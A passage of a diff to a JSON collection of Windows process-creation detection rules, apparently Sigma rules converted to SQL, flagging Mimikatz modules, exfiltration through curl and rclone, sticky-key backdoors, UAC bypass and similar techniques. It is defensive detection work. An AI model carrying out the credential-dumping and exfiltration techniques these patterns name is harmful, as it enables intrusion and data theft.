ESCAPE '\\' OR CommandLine LIKE '%::skeleton%' ESCAPE '\\' OR CommandLine LIKE '%::preshutdown%' ESCAPE '\\' OR CommandLine LIKE '%::mstsc%' ESCAPE '\\' OR CommandLine LIKE '%::multirdp%' ESCAPE '\\') OR (CommandLine LIKE '%rpc::%' ESCAPE '\\' OR CommandLine LIKE '%token::%' ESCAPE '\\' OR CommandLine LIKE '%crypto::%' ESCAPE '\\' OR CommandLine LIKE '%dpapi::%' ESCAPE '\\' OR CommandLine LIKE '%sekurlsa::%' ESCAPE '\\' OR CommandLine LIKE '%kerberos::%' ESCAPE '\\' OR CommandLine LIKE 
'%lsadump::%' ESCAPE '\\' OR CommandLine LIKE '%privilege::%' ESCAPE '\\' OR CommandLine LIKE '%process::%' ESCAPE '\\' OR CommandLine LIKE '%vault::%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\nmap.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\zennmap.exe' ESCAPE '\\') OR OriginalFileName IN ('nmap.exe', 'zennmap.exe')))" ], - "filename": "proc_creation_win_hktl_mimikatz_command_line.yml" + "filename": "proc_creation_win_pua_nmap_zenmap.yml" }, { - "title": "Sticky Key Like Backdoor Execution", - "id": "2fdefcb3-dbda-401e-ae23-f0db027628bc", - "status": "test", - "description": "Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen", - "author": "Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community", + "title": "HackTool - GMER Rootkit Detector and Remover Execution", + "id": "9082ff1f-88ab-4678-a3cc-5bcff99fc74d", + "status": "experimental", + "description": "Detects the execution GMER tool based on image and hash fields.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.persistence", - "attack.t1546.008", - "car.2014-11-003", - "car.2014-11-008" + "attack.defense_evasion" ], "falsepositives": [ "Unlikely" ], - "level": "critical", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\winlogon.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' 
OR NewProcessName LIKE '%\\\\wt.exe' ESCAPE '\\') AND (CommandLine LIKE '%sethc.exe%' ESCAPE '\\' OR CommandLine LIKE '%utilman.exe%' ESCAPE '\\' OR CommandLine LIKE '%osk.exe%' ESCAPE '\\' OR CommandLine LIKE '%Magnify.exe%' ESCAPE '\\' OR CommandLine LIKE '%Narrator.exe%' ESCAPE '\\' OR CommandLine LIKE '%DisplaySwitch.exe%' ESCAPE '\\'))" - ], - "filename": "proc_creation_win_cmd_sticky_key_like_backdoor_execution.yml" - }, - { - "title": "Suspicious Rundll32 Activity", - "id": "e593cf51-88db-4ee1-b920-37e89012a3c9", - "status": "test", - "description": "Detects suspicious process related to rundll32 based on arguments", - "author": "juju4, Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali", - "tags": [ - "attack.defense_evasion", - "attack.t1218.011" - ], - "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment" - ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%javascript:%' ESCAPE '\\' AND CommandLine LIKE '%.RegisterXLL%' ESCAPE '\\') OR (CommandLine LIKE '%url.dll%' ESCAPE '\\' AND CommandLine LIKE '%OpenURL%' ESCAPE '\\') OR (CommandLine LIKE '%url.dll%' ESCAPE '\\' AND CommandLine LIKE '%OpenURLA%' ESCAPE '\\') OR (CommandLine LIKE '%url.dll%' ESCAPE '\\' AND CommandLine LIKE '%FileProtocolHandler%' ESCAPE '\\') OR (CommandLine LIKE '%zipfldr.dll%' ESCAPE '\\' AND CommandLine LIKE '%RouteTheCall%' ESCAPE '\\') OR (CommandLine LIKE '%shell32.dll%' ESCAPE '\\' AND CommandLine LIKE '%Control\\_RunDLL%' ESCAPE '\\') OR (CommandLine LIKE '%shell32.dll%' ESCAPE '\\' AND CommandLine LIKE '%ShellExec\\_RunDLL%' ESCAPE '\\') OR (CommandLine LIKE '%mshtml.dll%' ESCAPE '\\' AND CommandLine LIKE '%PrintHTML%' ESCAPE '\\') OR (CommandLine LIKE '%advpack.dll%' ESCAPE '\\' AND CommandLine LIKE '%LaunchINFSection%' ESCAPE '\\') OR (CommandLine LIKE '%advpack.dll%' ESCAPE '\\' AND CommandLine LIKE 
'%RegisterOCX%' ESCAPE '\\') OR (CommandLine LIKE '%ieadvpack.dll%' ESCAPE '\\' AND CommandLine LIKE '%LaunchINFSection%' ESCAPE '\\') OR (CommandLine LIKE '%ieadvpack.dll%' ESCAPE '\\' AND CommandLine LIKE '%RegisterOCX%' ESCAPE '\\') OR (CommandLine LIKE '%ieframe.dll%' ESCAPE '\\' AND CommandLine LIKE '%OpenURL%' ESCAPE '\\') OR (CommandLine LIKE '%shdocvw.dll%' ESCAPE '\\' AND CommandLine LIKE '%OpenURL%' ESCAPE '\\') OR (CommandLine LIKE '%syssetup.dll%' ESCAPE '\\' AND CommandLine LIKE '%SetupInfObjectInstallAction%' ESCAPE '\\') OR (CommandLine LIKE '%setupapi.dll%' ESCAPE '\\' AND CommandLine LIKE '%InstallHinfSection%' ESCAPE '\\') OR (CommandLine LIKE '%pcwutl.dll%' ESCAPE '\\' AND CommandLine LIKE '%LaunchApplication%' ESCAPE '\\') OR (CommandLine LIKE '%dfshim.dll%' ESCAPE '\\' AND CommandLine LIKE '%ShOpenVerbApplication%' ESCAPE '\\') OR (CommandLine LIKE '%dfshim.dll%' ESCAPE '\\' AND CommandLine LIKE '%ShOpenVerbShortcut%' ESCAPE '\\') OR (CommandLine LIKE '%scrobj.dll%' ESCAPE '\\' AND CommandLine LIKE '%GenerateTypeLib%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\') OR (CommandLine LIKE '%shimgvw.dll%' ESCAPE '\\' AND CommandLine LIKE '%ImageView\\_Fullscreen%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%shell32.dll,Control\\_RunDLL desk.cpl,screensaver,@screensaver%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\control.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%.cpl%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\control.exe' ESCAPE '\\' AND CommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\rundll32.exe\" Shell32.dll,Control\\_RunDLL \"C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.cpl\",' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\gmer.exe' ESCAPE '\\' OR (Hashes LIKE '%MD5=E9DC058440D321AA17D0600B3CA0AB04%' ESCAPE '\\' OR Hashes LIKE 
'%SHA1=539C228B6B332F5AA523E5CE358C16647D8BBE57%' ESCAPE '\\' OR Hashes LIKE '%SHA256=E8A3E804A96C716A3E9B69195DB6FFB0D33E2433AF871E4D4E1EAB3097237173%' ESCAPE '\\') OR md5 = 'e9dc058440d321aa17d0600b3ca0ab04' OR sha1 = '539c228b6b332f5aa523e5ce358c16647d8bbe57' OR sha256 = 'e8a3e804a96c716a3e9b69195db6ffb0d33e2433af871e4d4e1eab3097237173'))" ], - "filename": "proc_creation_win_rundll32_susp_activity.yml" + "filename": "proc_creation_win_hktl_gmer.yml" }, { - "title": "Potential Data Exfiltration Activity Via CommandLine Tools", - "id": "7d1aaf3d-4304-425c-b7c3-162055e0b3ab", + "title": "PUA - Rclone Execution", + "id": "e37db05d-d1f9-49c8-b464-cee1a4b11638", "status": "experimental", - "description": "Detects the use of various CLI utilities exfiltrating data via web requests", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects execution of RClone utility for exfiltration as used by various ransomwares strains like REvil, Conti, FiveHands, etc", + "author": "Bhabesh Raj, Sittikorn S, Aaron Greetham (@beardofbinary) - NCC Group", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.exfiltration", + "attack.t1567.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\' OR CommandLine LIKE '%curl %' ESCAPE '\\') AND CommandLine LIKE '% -ur%' ESCAPE '\\' AND CommandLine LIKE '% -me%' ESCAPE '\\' AND CommandLine LIKE '% -b%' ESCAPE '\\' AND CommandLine LIKE '% POST %' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' AND CommandLine LIKE '%--ur%' ESCAPE '\\' AND (CommandLine LIKE '% -d %' ESCAPE '\\' OR CommandLine LIKE 
'% --data %' ESCAPE '\\'))) AND ((CommandLine LIKE '%ToBase64String%' ESCAPE '\\' OR CommandLine LIKE '%whoami%' ESCAPE '\\' OR CommandLine LIKE '%nltest%' ESCAPE '\\' OR CommandLine LIKE '%ifconfig%' ESCAPE '\\' OR CommandLine LIKE '%hostname%' ESCAPE '\\' OR CommandLine LIKE '%net view%' ESCAPE '\\' OR CommandLine LIKE '%qprocess%' ESCAPE '\\' OR CommandLine LIKE '%netstat%' ESCAPE '\\' OR CommandLine LIKE '%systeminfo%' ESCAPE '\\' OR CommandLine LIKE '%tasklist%' ESCAPE '\\' OR CommandLine LIKE '%sc query%' ESCAPE '\\') OR (CommandLine LIKE '%type %' ESCAPE '\\' AND CommandLine LIKE '% > %' ESCAPE '\\' AND CommandLine LIKE '% C:\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%--config %' ESCAPE '\\' AND CommandLine LIKE '%--no-check-certificate %' ESCAPE '\\' AND CommandLine LIKE '% copy %' ESCAPE '\\') OR ((NewProcessName LIKE '%\\\\rclone.exe' ESCAPE '\\' OR Description = 'Rsync for cloud storage') AND (CommandLine LIKE '%pass%' ESCAPE '\\' OR CommandLine LIKE '%user%' ESCAPE '\\' OR CommandLine LIKE '%copy%' ESCAPE '\\' OR CommandLine LIKE '%sync%' ESCAPE '\\' OR CommandLine LIKE '%config%' ESCAPE '\\' OR CommandLine LIKE '%lsd%' ESCAPE '\\' OR CommandLine LIKE '%remote%' ESCAPE '\\' OR CommandLine LIKE '%ls%' ESCAPE '\\' OR CommandLine LIKE '%mega%' ESCAPE '\\' OR CommandLine LIKE '%pcloud%' ESCAPE '\\' OR CommandLine LIKE '%ftp%' ESCAPE '\\' OR CommandLine LIKE '%ignore-existing%' ESCAPE '\\' OR CommandLine LIKE '%auto-confirm%' ESCAPE '\\' OR CommandLine LIKE '%transfers%' ESCAPE '\\' OR CommandLine LIKE '%multi-thread-streams%' ESCAPE '\\' OR CommandLine LIKE '%no-check-certificate %' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_susp_data_exfiltration_via_cli.yml" + "filename": "proc_creation_win_pua_rclone_execution.yml" }, { - "title": "Suspicious Registration via cscript.exe", - "id": "28c8f68b-098d-45af-8d43-8089f3e35403", + "title": "Gpg4Win Decrypt Files From Suspicious 
Locations", + "id": "e1e0b7d7-e10b-4ee4-ac49-a4bda05d320d", "status": "experimental", - "description": "Detects when the registration of a VSS/VDS Provider as a COM+ application.", - "author": "Austin Songer @austinsonger", + "description": "Detects usage of the Gpg4win to decrypt files located in suspicious locations from CLI", + "author": "Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Legitimate use" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' AND CommandLine LIKE '%-register%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Windows Kits\\\\10\\\\bin\\\\10.0.22000.0\\\\x64%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows Kits\\\\10\\\\bin\\\\10.0.19041.0\\\\x64%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows Kits\\\\10\\\\bin\\\\10.0.17763.0\\\\x64%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\gpg2.exe' ESCAPE '\\' OR Product = 'GNU Privacy Guard (GnuPG)' OR Company = 'g10 Code GmbH') AND CommandLine LIKE '%-passphrase%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\temp%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_regsvr32_registration_via_cscript.yml" + "filename": "proc_creation_win_gpg4win_susp_usage.yml" }, { - "title": "MpiExec Lolbin", - "id": "729ce0ea-5d8f-4769-9762-e35de441586d", - "status": "test", - "description": "Detects a certain command line flag combination used by mpiexec.exe LOLBIN from HPC pack that can be used to execute any other binary", + "title": "Procdump Execution", + "id": "2e65275c-8288-4ab4-aeb7-6274f58b6b20", 
+ "status": "experimental", + "description": "Detects usage of the SysInternals Procdump utility", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", "attack.defense_evasion", - "attack.t1218" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\mpiexec.exe' ESCAPE '\\' OR Imphash = 'd8b52ef6aaa3a81501bdfff9dbb96217' OR Hashes LIKE '%IMPHASH=d8b52ef6aaa3a81501bdfff9dbb96217%' ESCAPE '\\') AND (CommandLine LIKE '% /n 1 %' ESCAPE '\\' OR CommandLine LIKE '% -n 1 %' ESCAPE '\\'))" - ], - "filename": "proc_creation_win_lolbin_mpiexec.yml" - }, - { - "title": "Domain Trust Discovery Via Dsquery", - "id": "3bad990e-4848-4a78-9530-b427d854aac0", - "status": "test", - "description": "Detects execution of \"dsquery.exe\" for domain trust discovery", - "author": "E.M. Anhaus, Tony Lambert, oscd.community, omkar72", - "tags": [ - "attack.discovery", - "attack.t1482" + "attack.t1036", + "attack.t1003.001" ], "falsepositives": [ - "Legitimate use of the utilities by legitimate user for legitimate reason" + "Legitimate use of procdump by a developer or administrator" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\dsquery.exe' ESCAPE '\\' OR OriginalFileName = 'dsquery.exe') AND CommandLine LIKE '%trustedDomain%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\procdump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procdump64.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_dsquery_domain_trust_discovery.yml" + "filename": "proc_creation_win_sysinternals_procdump.yml" }, { - "title": "Potential Privilege Escalation via Service Permissions Weakness", - "id": "0f9c21f1-6a73-4b0e-9809-cb562cb8d981", - "status": "test", - "description": "Detect modification of services 
configuration (ImagePath, FailureCommand and ServiceDLL) in registry by processes with Medium integrity level", - "author": "Teymur Kheirkhabarov", + "title": "Potential Russian APT Credential Theft Activity", + "id": "b83f5166-9237-4b5e-9cd4-7b5d52f4d8ee", + "status": "stable", + "description": "Detects Russian group activity as described in Global Threat Report 2019 by Crowdstrike", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1574.011" + "attack.credential_access", + "attack.t1552.001", + "attack.t1003.003" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND IntegrityLevel = 'Medium' AND CommandLine LIKE '%ControlSet%' ESCAPE '\\' AND CommandLine LIKE '%services%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\ImagePath%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FailureCommand%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ServiceDll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%xcopy /S /E /C /Q /H \\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%\\\\sysvol\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%adexplorer -snapshot \"\" c:\\\\users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\downloads\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.snp%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_registry_privilege_escalation_via_service_key.yml" + "filename": "proc_creation_win_apt_bear_activity_gtr19.yml" }, { - "title": "PsExec Service Execution", - "id": "fdfcbd78-48f1-4a4b-90ac-d82241e368c5", + "title": "Potential Recon Activity Using Wevtutil", + "id": "beaa66d6-aa1b-4e3c-80f5-e0145369bfaf", "status": "experimental", - "description": "Detects launch of the PSEXESVC service, which means that this system was the target of a psexec remote execution", - "author": "Thomas Patzke, Romaissa Adjailia, Florian Roth (Nextron Systems)", + 
"description": "Detects usage of the wevtutil utility to perform reconnaissance", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution" + "attack.discovery" ], "falsepositives": [ - "Legitimate administrative tasks" + "Legitimate usage of the utility by administrators to query the event log" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE 'C:\\\\Windows\\\\PSEXESVC.exe' ESCAPE '\\' OR OriginalFileName = 'psexesvc.exe'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\wevtutil.exe' ESCAPE '\\' AND (CommandLine LIKE '% qe %' ESCAPE '\\' OR CommandLine LIKE '% query-events %' ESCAPE '\\') AND (CommandLine LIKE '%Microsoft-Windows-TerminalServices-LocalSessionManager/Operational%' ESCAPE '\\' OR CommandLine LIKE '%Microsoft-Windows-Terminal-Services-RemoteConnectionManager/Operational%' ESCAPE '\\' OR CommandLine LIKE '%Security%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sysinternals_psexesvc.yml" + "filename": "proc_creation_win_wevtutil_recon.yml" }, { - "title": "Devtoolslauncher.exe Executes Specified Binary", - "id": "cc268ac1-42d9-40fd-9ed3-8c4e1a5b87e6", - "status": "test", - "description": "The Devtoolslauncher.exe executes other binary", - "author": "Beyu Denis, oscd.community (rule), @_felamos (idea)", + "title": "RunDLL32 Spawning Explorer", + "id": "caa06de8-fdef-4c91-826a-7f9e163eef4b", + "status": "experimental", + "description": "Detects RunDLL32.exe spawning explorer.exe as child, which is very uncommon, often observes Gamarue spawning the explorer.exe process in an unusual way", + "author": "elhoim, CD_ROM_", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.t1218.011" ], "falsepositives": [ - "Legitimate use of devtoolslauncher.exe by legitimate user" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' 
AND NewProcessName LIKE '%\\\\devtoolslauncher.exe' ESCAPE '\\' AND CommandLine LIKE '%LaunchForDeploy%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\') AND NOT (ParentCommandLine LIKE '%\\\\shell32.dll,Control\\_RunDLL%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_devtoolslauncher.yml" + "filename": "proc_creation_win_rundll32_spawn_explorer.yml" }, { - "title": "Abuse of Service Permissions to Hide Services Via Set-Service", - "id": "514e4c3a-c77d-4cde-a00f-046425e2301e", + "title": "Mstsc.EXE Execution From Uncommon Parent", + "id": "ff3b6b39-e765-42f9-bb2c-ea6761e0e0f6", "status": "experimental", - "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. (Works only in powershell 7)", + "description": "Detects potential RDP connection via Mstsc using a local \".rdp\" file located in suspicious locations.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.011" + "attack.lateral_movement" ], "falsepositives": [ - "Rare intended use of hidden services" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR OriginalFileName = 'pwsh.dll') AND (CommandLine LIKE '%Set-Service %' ESCAPE '\\' AND CommandLine LIKE '%DCLCWPDTSD%' ESCAPE '\\') AND (CommandLine LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR CommandLine LIKE '%-sd %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\brave.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\CCleanerBrowser.exe' 
ESCAPE '\\' OR ParentProcessName LIKE '%\\\\chrome.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\chromium.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\firefox.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\microsoftedge.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\msedge.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\opera.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\vivaldi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\whale.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\mstsc.exe' ESCAPE '\\' OR OriginalFileName = 'mstsc.exe'))" ], - "filename": "proc_creation_win_powershell_hide_services_via_set_service.yml" + "filename": "proc_creation_win_mstsc_run_local_rpd_file_susp_parent.yml" }, { - "title": "PUA - 3Proxy Execution", - "id": "f38a82d2-fba3-4781-b549-525efbec8506", + "title": "Allow Service Access Using Security Descriptor Tampering Via Sc.EXE", + "id": "6c8fbee5-dee8-49bc-851d-c3142d02aa47", "status": "experimental", - "description": "Detects the use of 3proxy, a tiny free proxy server", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects suspicious DACL modifications to allow access to a service from a suspicious trustee. 
This can be used to override access restrictions set by previous ACLs.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1572" + "attack.persistence", + "attack.t1543.003" ], "falsepositives": [ - "Administrative activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\3proxy.exe' ESCAPE '\\' OR Description = '3proxy - tiny proxy server' OR CommandLine LIKE '%.exe -i127.0.0.1 -p%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND (CommandLine LIKE '%sdset%' ESCAPE '\\' AND CommandLine LIKE '%A;%' ESCAPE '\\') AND (CommandLine LIKE '%;IU%' ESCAPE '\\' OR CommandLine LIKE '%;SU%' ESCAPE '\\' OR CommandLine LIKE '%;BA%' ESCAPE '\\' OR CommandLine LIKE '%;SY%' ESCAPE '\\' OR CommandLine LIKE '%;WD%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_3proxy_execution.yml" + "filename": "proc_creation_win_sc_sdset_allow_service_changes.yml" }, { - "title": "Remote Access Tool - LogMeIn Execution", - "id": "d85873ef-a0f8-4c48-a53a-6b621f11729d", - "status": "test", - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. 
(Citation: Symantec Living off the Land)\n", - "author": "frack113", + "title": "Potential Password Spraying Attempt Using Dsacls.EXE", + "id": "bac9fb54-2da7-44e9-988f-11e9a5edbc0c", + "status": "experimental", + "description": "Detects possible password spraying attempts using Dsacls", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.execution", + "attack.t1218" ], "falsepositives": [ - "Legitimate use" + "Legitimate use of dsacls to bind to an LDAP session" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description = 'LMIGuardianSvc' OR Product = 'LMIGuardianSvc' OR Company = 'LogMeIn, Inc.'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\dsacls.exe' ESCAPE '\\' OR OriginalFileName = 'DSACLS.EXE') AND (CommandLine LIKE '%/user:%' ESCAPE '\\' AND CommandLine LIKE '%/passwd:%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_remote_access_tools_logmein.yml" + "filename": "proc_creation_win_dsacls_password_spray.yml" }, { - "title": "UAC Bypass Using Event Viewer RecentViews", - "id": "30fc8de7-d833-40c4-96b6-28319fbc4f6c", - "status": "test", - "description": "Detects the pattern of UAC Bypass using Event Viewer RecentViews", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "WmiPrvSE Spawned A Process", + "id": "d21374ff-f574-44a7-9998-4a8c8bf33d7d", + "status": "stable", + "description": "Detects WmiPrvSE spawning a process", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation" + "attack.execution", + "attack.t1047" ], "falsepositives": [ - "Unknown" + "False positives are expected (e.g. 
in environments where WinRM is used legitimately)" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%\\\\Event Viewer\\\\RecentViews%' ESCAPE '\\' OR CommandLine LIKE '%\\\\EventV~1\\\\RecentViews%' ESCAPE '\\') AND CommandLine LIKE '%>%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\WmiPrvSe.exe' ESCAPE '\\' AND NOT ((SubjectLogonId IN ('0x3e7', 'null')) OR ((User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\WerFault.exe' ESCAPE '\\') OR (SubjectLogonId = '')))" ], - "filename": "proc_creation_win_uac_bypass_eventvwr_recentviews.yml" + "filename": "proc_creation_win_wmiprvse_spawning_process.yml" }, { - "title": "Winnti Malware HK University Campaign", - "id": "3121461b-5aa0-4a41-b910-66d25524edbb", - "status": "test", - "description": "Detects specific process characteristics of Winnti malware noticed in Dec/Jan 2020 in a campaign against Honk Kong universities", - "author": "Florian Roth (Nextron Systems), Markus Neis", + "title": "PUA - Advanced Port Scanner Execution", + "id": "54773c5f-f1cc-4703-9126-2f797d96a69d", + "status": "experimental", + "description": "Detects the use of Advanced Port Scanner.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002", - "attack.g0044" + "attack.discovery", + "attack.t1046", + "attack.t1135" ], "falsepositives": [ - "Unlikely" + "Legitimate administrative use", + "Tools with similar commandline (very rare)" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((ParentProcessName LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\hpqhvind.exe%' ESCAPE '\\') AND NewProcessName LIKE 
